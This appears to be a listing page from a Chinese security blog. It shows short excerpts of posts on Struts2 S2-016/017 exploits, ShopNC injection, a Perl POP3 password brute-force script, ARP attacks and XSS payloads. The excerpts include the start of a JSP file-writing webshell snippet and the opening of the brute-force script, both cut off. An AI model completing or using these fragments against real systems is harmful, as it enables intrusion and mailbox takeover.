-
Struts2 S2-016/S2-017 exp
Struts2的很老的漏洞的一些 exp ,转过来当作记录吧。写入的文件内容:<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application...
-
shopnc 6.0单用户版本注入
Shopnc 版本有点多啊 都不太记得是哪个了。 ShopNC®天津网城科技有限公司Copyright© 2007-2009 ShopNC, Powered by ShopNC Team , All Rights Reserved津ICP备...
-
邮箱爆破脚本
#!/usr/bin/perluse Net::POP3;$email="pop.qq.com";$pop = Net::POP3->new($email)or die("ERROR: Unable to...
-
Arp攻防实战
在连续一周的时间里,我发现我无法上网。而在这一周的时间里,我做过各种尝试:我换过杀毒软件,重装过系统,甚至安装了Win7+Linux的双系统来使用,但是直到昨天晚上,我才猛然想起还有Arp这种攻击方式。好吧,我承认我运气不好。我做了很简单的...
-
77种网站XSS跨站攻击脚本语法
XSS又叫CSS (Cross-Site Script) ,跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS分两类:一类是来自内部的攻...
